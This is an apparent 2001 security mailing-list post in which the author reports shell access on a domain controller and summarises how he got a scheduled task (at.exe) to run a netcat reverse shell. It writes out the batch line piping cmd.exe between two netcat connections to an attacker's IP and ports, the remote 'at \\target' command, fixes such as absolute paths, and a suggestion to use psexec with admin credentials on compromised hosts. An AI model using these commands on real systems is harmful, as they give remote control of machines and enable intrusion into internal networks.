summary of : problems to start a task with at.exe

From: otanerat_private
Date: Thu Nov 15 2001 - 08:25:25 PST

    Hello together,

    First of all, I got a lot of input from you guys, thanks for that.
    I have now shell access on the domain controller and with some tricks
    and brain work also telnet access on the main unix-system in their
    internal network. I think, that's a good finding :-)

    I want to give all of you a short summary of all the hints. If you
    are not interested, send this mail directly to /dev/null. Anyway,
    maybe some of you will find this helpful and here it comes:

    the content of my batch file was:

    c:\nc.exe IP_attacker port1_attacker | cmd.exe | nc.exe IP_attacker
    port2_attacker

    the command:

    at \\target time "c:\test.bat"

    Tipp 1.) use the absolute path in the batch

    - I'm stupied, but this was, in my case, the right solution. I typed the
    following
      and that worked fine:

      c:\nc.exe IP_attacker port1_attacker | cmd.exe | c:\nc.exe IP_attacker
    port2_attacker

      I forgot the c:\ in front of the second nc.exe. It is not necessary to use
    the absolute path for the cmd.exe, but for the nc.exe.

    Tipp 2.) don't use the quotes in the command
    - Well, I tried both, with and without quotes - same result

    Tipp 3.) use /interactive
    - same as above

    Tipp 4.) use the tool psexec
    - This tool is realy cool. If you can upload tools to a compromised system
    in the DMZ and
      you are able to execute it - this tool can solve a lot of your problems
    :-) But you need
      the username and the password (local admin).

    Thanks again for all your input.

    Regards
    Renato

    http://www.gmx.net

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/